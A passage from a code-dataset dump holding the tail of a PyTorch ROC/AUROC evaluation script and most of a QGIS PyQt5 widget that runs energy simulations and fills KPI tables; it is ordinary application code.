args[\"path\"]\n\n\nroot_dir = config.IMAGE_DATASET_PATH\ncsv_file = config.test_dataset_path(LETTER)\n\ndef each_model(path, dir):\n\tprint(\"[INFO] load up model \" + dir +\"...\")\n\tunet = torch.load(MODEL_PATH).to(config.DEVICE)\n\ty_intensity_ = []\n\tpreds_intensity_ = []\n\tunet.eval()\n\t# turn off gradient tracking\n\twith torch.no_grad():\n\t\tfor (x, y0, y1, y2) in testLoader:\n\t\t\t# send the input to the device\n\t\t\tx = x.to(config.DEVICE)\n\t\t\tpreds = unet(x)\n\t\t\ty_intensity_ += [y2.cpu().item(), ]\n\t\t\tpreds_intensity_ += 
[torch.sigmoid(preds[2].squeeze()).cpu().item(), ]\n\n\ty_intensity = np.array(y_intensity_)\n\tpreds_intensity = np.array(preds_intensity_)\n\n\tfpr, tpr, thresholds = roc_curve(y_intensity, preds_intensity)\n\tauroc = roc_auc_score(y_intensity, preds_intensity)\n\tprint('AUROC: ', auroc)\n\toptimal_idx = np.argmax(tpr - fpr)\n\toptimal_threshold = thresholds[optimal_idx]\n\tprint(\"Threshold optimal value is:\", optimal_threshold)\n\tplot_roc_curve(fpr, tpr, dir, auroc=auroc)\n\n\tpreds_intensity_old = torch.where(torch.Tensor(preds_intensity.squeeze()).to(config.DEVICE) > torch.Tensor([config.THRESHOLD]).to(config.DEVICE), 1, 0).squeeze().cpu()\n\tprint('Intensity accuracy old',len(np.array(torch.where((torch.Tensor(preds_intensity_old) == torch.Tensor(y_intensity)))[0])) / len(testLoader))\n\t#print(confusion_matrix(preds_intensity_old, y_intensity))\n\t\n\tpreds_intensity_new = torch.where(torch.Tensor(preds_intensity.squeeze()).to(config.DEVICE) > torch.Tensor([optimal_threshold]).to(config.DEVICE), 1, 0).squeeze().cpu()\n\tprint('Intensity accuracy new', len(np.array(torch.where((torch.Tensor(preds_intensity_new) == torch.Tensor(y_intensity)))[0])) / len(testLoader))\n\t#print(confusion_matrix(preds_intensity_new, y_intensity))\n\n\nif __name__ == '__main__':\n\tprint(\"[INFO] loading up test image paths...\")\n\ttestData = MultiTaskDataset(csv_file=csv_file, root_dir=root_dir)\n\ttestLoader = DataLoader(testData, shuffle=False, batch_size=1, pin_memory=config.PIN_MEMORY, num_workers=2)\n\tfig = plt.figure(1)\n\tplt.plot([0, 1], [0, 1], color='darkblue', linestyle=(0, (1, 10)))\n\tfor dir in next(os.walk(config.BASE_OUTPUT))[1]:\n\t\tif not (dir == 'tmp' or dir == 'Confusions' or dir == 'Confusions Absolute' or dir == 'Rocs'):\n\t\t\tMODEL_PATH = os.path.join(config.BASE_OUTPUT, dir) + '/model' + LETTER\n\t\t\teach_model(MODEL_PATH, dir)\n\t\t\tprint('model ' + dir + ' success')\n\n\tplt.legend()\n\tplt.xlabel('False Positive Rate')\n\tplt.ylabel('True Positive Rate')\n\tplt.title('Receiver Operating Characteristic (ROC) Curve')\n\n\tfig.savefig(os.path.join(config.BASE_OUTPUT, OUTPUT) + '/roc'+LETTER+'.pdf')\n\n\n\n\n\n","repo_name":"gargiuloanna/Medical-Imaging","sub_path":"MultiTask/roc.py","file_name":"roc.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17970826083","text":"import os\n\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import QColor, QPixmap, QIcon, QBrush\nimport os.path\nimport logging\nimport sys\nimport traceback\nimport time\n\n# Import PyQt5\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\n\n\n# Import qgis main libraries\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom qgis.utils import *\n\n# Import the custom tree widget items\nfrom .utility.filters.FECvisualizerService import FECvisualizerService\n\nfrom .building.DPM import *\nfrom .dialogSources import CheckSourceDialog\nfrom .technology.Technology import *\n\nfrom .Tjulia.Solar_thermal_production import generate_solar_thermal_forJulia\nfrom .Tjulia.single_building.Dem_cool_heating import generafile\nfrom .Tjulia.gui.SimulationDetailsWorker import SimulationDetailsWorker\nfrom .Tjulia.DistrictSimulator import DistrictSimulator\nfrom .Tjulia.test.MyLog import MyLog\n\nfrom .utility.pvgis.PvgisApiWorker import PvgisApiWorker\nfrom .utility.exceptions.UserInterruptException import UserInterruptException\n\nfrom . 
import master_planning_config\n\nimport requests\n\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'ui', 'Step2dockwidget.ui'))\n\n\nclass Step2_widget(QtWidgets.QDockWidget, FORM_CLASS):\n step2_closing_signal = pyqtSignal()\n send_KPIs_to_future = pyqtSignal(dict)\n update_progress_bar = pyqtSignal(int)\n stop_progress_bar = pyqtSignal()\n\n def attivati(self):\n print(\"ciao\")\n\n def __init__(self, work_folder=None, parent=None, iface=None):\n \"\"\"Constructor.\"\"\"\n super(Step2_widget, self).__init__(parent)\n\n self.logger = logging.getLogger(__name__)\n self.my_log = MyLog(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"test\", \"log\",\n \"log_simulator.txt\"))\n # Set up the user interface from Designer.\n # After setupUI you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.iface = iface\n self.loading_mode_on = False\n self.baseline_buildings_widget = None\n self.baseline_sources_table = None\n self.baseline_scenario = None\n self.DHN_network_list = []\n self.DCN_network_list = []\n self.step0 = None\n self.step1 = None\n self.KPIs = None\n self.work_folder = work_folder\n self.simulator = None\n\n self.sources = CheckSourceDialog()\n\n for table in [self.tableWidget_5, self.tableWidget_2, self.tableWidget_3, self.tableWidget_4]:\n for i in range(table.rowCount()):\n for j in range(table.columnCount()):\n widget_item = table.item(i, j)\n if widget_item is not None:\n widget_item.setFlags(Qt.ItemIsEnabled)\n if j == 0:\n widget_item.setBackground(QBrush(QColor(Qt.white)))\n\n\n self.progressBar.hide()\n # self.tableWidget_5.setSpan(1, 0, 2, 1)\n # self.tableWidget_5.setSpan(3, 0, 2, 1)\n # self.tableWidget_5.setSpan(5, 0, 2, 1)\n # self.tableWidget_5.setSpan(7, 0, 2, 1)\n # self.tableWidget_5.setSpan(9, 0, 2, 1)\n # self.tableWidget_5.setSpan(11, 0, 2, 1)\n # self.tableWidget_5.setSpan(13, 0, 2, 1)\n # self.tableWidget_5.setSpan(16, 0, 2, 1)\n # self.tableWidget_2.setSpan(1, 0, 2, 1)\n # self.tableWidget_2.setSpan(3, 0, 6, 1)\n self.heat = None\n self.temperature = None\n\n icon = QIcon()\n icon_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"icons\",\n \"edit.png\")\n icon.addPixmap(QPixmap(icon_path), QIcon.Normal, QIcon.Off)\n self.calculateKpi.setIcon(icon)\n\n self.calculateKpi.clicked.connect(self.show_progress_bar)\n\n self.fec_visualizer_service = FECvisualizerService(self.output_table, self.fec_filter_combo_box,\n self.description_filter_label, mode=\"baseline\")\n\n self.mode_individual_buildings_active = False\n self.mode_networks_active = False\n\n self.tableWidget_5.hideRow(3)\n self.tableWidget_5.hideRow(4)\n self.tableWidget_5.hideRow(23)\n self.tableWidget_2.hideRow(9)\n for i in range(self.tableWidget_3.rowCount()):\n if i not in [0, 5]:\n self.tableWidget_3.hideRow(i)\n\n self.tabWidget.setCurrentIndex(0)\n self.pop_up_progress_bar = None\n\n def closeEvent(self, event):\n self.closeStep2()\n event.accept()\n\n def closeStep2(self):\n if not self.loading_mode_on:\n if self.KPIs is None:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Question)\n msg.setStandardButtons(QMessageBox.Yes|QMessageBox.No)\n msg.setWindowTitle(\"KPIs uncomputed\")\n msg.setText(\"The KPIs have not been calculated. 
They need to be computed to run the simulation.\"\n + \" Do you want to continue anyway ?\")\n retval = msg.exec_()\n if retval == QMessageBox.No:\n return\n self.hide()\n self.step2_closing_signal.emit()\n\n def show_progress_bar(self):\n\n max_progress = 0\n max_progress = max_progress + (\n len(self.DHN_network_list) + len(self.DCN_network_list)) * 4\n try:\n for _ in self.baseline_scenario.getFeatures():\n max_progress = max_progress + 1\n except:\n pass\n #self.progressBar.setMaximum(max_progress)\n #self.progressBar.setMinimum(0)\n #self.progressBar.setValue(0)\n #self.progressBar.show()\n #self.label_3.setText(\"Starting computation...\")\n\n def update_mode_networks(self, isactive):\n self.mode_networks_active = isactive\n\n def update_mode_single_buildings(self, isactive):\n self.mode_individual_buildings_active = isactive\n\n def KPIs_baselineScenario(self):\n self.my_log.log(\"GENERAL COMPUTATION STARTS\")\n kpis_folder = os.path.join(master_planning_config.CURRENT_PLANNING_DIRECTORY,\n master_planning_config.DISTRICT_FOLDER,\n master_planning_config.KPIS_FOLDER)\n\n #======================= Network approach =========================\n if True:#self.mode_networks_active:\n self.my_log.log(\"NETWORKS GENERAL COMPUTATION STARTS\")\n #dr = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"district\", \"heating\")\n dr = os.path.join(kpis_folder, \"Tjulia\", \"district\", \"heating\")\n self.remove_files(os.path.join(dr, \"Results\"), \"Result\")\n #dr_sim = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"district\")\n dr_sim = os.path.join(kpis_folder, \"Tjulia\", \"district\")\n\n print(\"Step2.py, KPIs_baselineScenario(): setting up simulator\")\n self.set_up_simulator()\n print(\"Step2.py, KPIs_baselineScenario(): running district simulator\")\n # thread_networks = QThread()\n # self.simulator.main_thread = QtCore.QThread.currentThread()\n # self.simulator.moveToThread(thread_networks)\n # self.simulator.finished.connect(thread_networks.quit)\n # thread_networks.finished.connect(thread_networks.deleteLater)\n # thread_networks.started.connect(lambda: self.simulator.run_district(dr_sim))\n # thread_networks.start()\n self.simulator.run_district(dr_sim)\n self.my_log.log(\"NETWORKS GENERAL COMPUTATION ENDS\")\n\n #======================= Buildings approach =========================\n\n if True:#self.mode_individual_buildings_active:\n self.my_log.log(\"BUILDINGS GENERAL COMPUTATION STARTS\")\n now = time.time()\n #dr = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"Tjulia\", \"single_building\")\n dr = os.path.join(kpis_folder, \"Tjulia\", \"single_building\")\n # ==> [PlanHeatProjectName]_hourly.csv\n # DEM_cool_time.csv\n # DEM_time.csv\n # DEM_DHW_time.csv\n print(\"Step2.py, KPIs_baselineScenario(): generating hourly profiles\")\n cinput = os.path.join( master_planning_config.CURRENT_MAPPING_DIRECTORY,\n master_planning_config.DMM_FOLDER,\n master_planning_config.DMM_PREFIX+master_planning_config.DMM_HOURLY_SUFFIX+\".csv\")\n n, buildings = generafile(self.step1.dmmTree, cinput=cinput, coutput=os.path.join(dr, \"input\"))\n self.my_log.log(\"Hourly profiles processed in \" + str(time.time()-now) + \" seconds.\")\n now = time.time()\n self.remove_files(os.path.join(dr, \"Results\"), \"Result\")\n self.my_log.log(\"Old results removed in \" + str(time.time() - now) + \" seconds.\")\n now = time.time()\n self.my_log.log(\"Common precaltulations done in \" + str(time.time() - now) + \" seconds.\")\n print(\"Step2.py, 
KPIs_baselineScenario(): running building calculation*\")\n self.simulator.run_buildings(buildings, dr, log=self.my_log)\n self.simulator.progress_bar = self.progressBar\n self.my_log.log(\"BUILDINGS GENERAL COMPUTATION ENDS\")\n\n\n #================================================================\n KPIs = self.simulator.close_simulation()\n self.fec_visualizer_service.set_KPIs(KPIs)\n\n self.KPIs = KPIs\n\n self.send_KPIs_to_future.emit(self.KPIs)\n\n cellr =QTableWidgetItem(str(KPIs[\"EN_1.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_1.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_1.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(1, 3, cellr)\n self.tableWidget_5.setItem(1, 4, cellt)\n self.tableWidget_5.setItem(1, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_1.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_1.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_1.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(2, 3, cellr)\n self.tableWidget_5.setItem(2, 4, cellt)\n self.tableWidget_5.setItem(2, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(3, 3, cellr)\n self.tableWidget_5.setItem(3, 4, cellt)\n self.tableWidget_5.setItem(3, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_2.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_2.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_2.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(4, 3, cellr)\n self.tableWidget_5.setItem(4, 4, cellt)\n self.tableWidget_5.setItem(4, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_3.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_3.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_3.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(5, 3, cellr)\n self.tableWidget_5.setItem(5, 4, cellt)\n self.tableWidget_5.setItem(5, 5, cell)\n\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_3.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_3.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_3.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(6, 3, cellr)\n self.tableWidget_5.setItem(6, 4, cellt)\n self.tableWidget_5.setItem(6, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_4.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_4.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_4.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(7, 3, cellr)\n self.tableWidget_5.setItem(7, 4, cellt)\n self.tableWidget_5.setItem(7, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_4.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n 
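# NOTE: the KPI cells in this method all follow the same fill pattern; a\n # hypothetical helper (name and scope assumed, not part of the original\n # plugin) could express most of the blocks in one call each, e.g.:\n #\n # def set_kpi_row(table, row, key, fmt=str):\n # for col, suffix in ((3, \"R\"), (4, \"T\"), (5, \"\")):\n # item = QTableWidgetItem(fmt(KPIs[key + suffix]))\n # item.setFlags(QtCore.Qt.ItemIsEnabled)\n # table.setItem(row, col, item)\n #\n # set_kpi_row(self.tableWidget_5, 8, \"EN_4.2\", self.round_to_string)\n 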
cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(8, 3, cellr)\n self.tableWidget_5.setItem(8, 4, cellt)\n self.tableWidget_5.setItem(8, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_5.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_5.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_5.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(9, 3, cellr)\n self.tableWidget_5.setItem(9, 4, cellt)\n self.tableWidget_5.setItem(9, 5, cell)\n\n cellr = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2R\"]))\n cellt = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2T\"]))\n cell = QTableWidgetItem('{:.2f}'.format(KPIs[\"EN_5.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(10, 3, cellr)\n self.tableWidget_5.setItem(10, 4, cellt)\n self.tableWidget_5.setItem(10, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_6.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_6.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_6.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(11, 3, cellr)\n self.tableWidget_5.setItem(11, 4, cellt)\n self.tableWidget_5.setItem(11, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_6.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(12, 3, cellr)\n self.tableWidget_5.setItem(12, 4, cellt)\n self.tableWidget_5.setItem(12, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_7.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_7.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_7.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(13, 3, cellr)\n self.tableWidget_5.setItem(13, 4, cellt)\n self.tableWidget_5.setItem(13, 5, cell)\n\n cellr = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2R\"]))\n cellt = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2T\"]))\n cell = QTableWidgetItem(self.round_to_string(KPIs[\"EN_7.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(14, 3, cellr)\n self.tableWidget_5.setItem(14, 4, cellt)\n self.tableWidget_5.setItem(14, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_9.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_9.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_9.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(15, 3, cellr)\n self.tableWidget_5.setItem(15, 4, cellt)\n self.tableWidget_5.setItem(15, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_11.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_11.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_11.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(16, 3, cellr)\n self.tableWidget_5.setItem(16, 4, cellt)\n 
self.tableWidget_5.setItem(16, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_11.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_11.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_11.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(17, 3, cellr)\n self.tableWidget_5.setItem(17, 4, cellt)\n self.tableWidget_5.setItem(17, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_12.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_12.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_12.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(18, 3, cellr)\n self.tableWidget_5.setItem(18, 4, cellt)\n self.tableWidget_5.setItem(18, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_13.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_13.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_13.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(19, 3, cellr)\n self.tableWidget_5.setItem(19, 4, cellt)\n self.tableWidget_5.setItem(19, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_13.1bR\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_13.1bT\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_13.1b\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(20, 3, cellr)\n self.tableWidget_5.setItem(20, 4, cellt)\n self.tableWidget_5.setItem(20, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_14.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_14.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_14.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(21, 3, cellr)\n self.tableWidget_5.setItem(21, 4, cellt)\n self.tableWidget_5.setItem(21, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"EN_14.1bR\"]))\n cellt = QTableWidgetItem(str(KPIs[\"EN_14.1bT\"]))\n cell = QTableWidgetItem(str(KPIs[\"EN_14.1b\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(22, 3, cellr)\n self.tableWidget_5.setItem(22, 4, cellt)\n self.tableWidget_5.setItem(22, 5, cell)\n self.tableWidget_5.setItem(22, 5, cell)\n\n cellr = QTableWidgetItem(\"Nan\")\n cellt = QTableWidgetItem(\"Nan\")\n cell = QTableWidgetItem(\"Nan\")\n # cellr = QTableWidgetItem(str(KPIs[\"EN_15.1R\"]))\n # cellt = QTableWidgetItem(str(KPIs[\"EN_15.1T\"]))\n # cell = QTableWidgetItem(str(KPIs[\"EN_15.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_5.setItem(23, 3, cellr)\n self.tableWidget_5.setItem(23, 4, cellt)\n self.tableWidget_5.setItem(23, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_1.3R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_1.3T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_1.3\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(1, 3, cellr)\n self.tableWidget_2.setItem(1, 4, cellt)\n self.tableWidget_2.setItem(1, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_1.4R\"]))\n cellt = 
QTableWidgetItem(str(KPIs[\"ENV_1.4T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_1.4\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(2, 3, cellr)\n self.tableWidget_2.setItem(2, 4, cellt)\n self.tableWidget_2.setItem(2, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(3, 3, cellr)\n self.tableWidget_2.setItem(3, 4, cellt)\n self.tableWidget_2.setItem(3, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.2R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.2T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.2\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(4, 3, cellr)\n self.tableWidget_2.setItem(4, 4, cellt)\n self.tableWidget_2.setItem(4, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.7R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.7T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.7\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(5, 3, cellr)\n self.tableWidget_2.setItem(5, 4, cellt)\n self.tableWidget_2.setItem(5, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.8R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.8T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.8\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(6, 3, cellr)\n self.tableWidget_2.setItem(6, 4, cellt)\n self.tableWidget_2.setItem(6, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.13R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.13T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.13\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(7, 3, cellr)\n self.tableWidget_2.setItem(7, 4, cellt)\n self.tableWidget_2.setItem(7, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"ENV_2.14R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"ENV_2.14T\"]))\n cell = QTableWidgetItem(str(KPIs[\"ENV_2.14\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_2.setItem(8, 3, cellr)\n self.tableWidget_2.setItem(8, 4, cellt)\n self.tableWidget_2.setItem(8, 5, cell)\n\n cellr = QTableWidgetItem(str(KPIs[\"SO_3.1R\"]))\n cellt = QTableWidgetItem(str(KPIs[\"SO_3.1T\"]))\n cell = QTableWidgetItem(str(KPIs[\"SO_3.1\"]))\n cellr.setFlags(QtCore.Qt.ItemIsEnabled)\n cellt.setFlags(QtCore.Qt.ItemIsEnabled)\n cell.setFlags(QtCore.Qt.ItemIsEnabled)\n self.tableWidget_4.setItem(4, 3, cellr)\n self.tableWidget_4.setItem(4, 4, cellt)\n self.tableWidget_4.setItem(4, 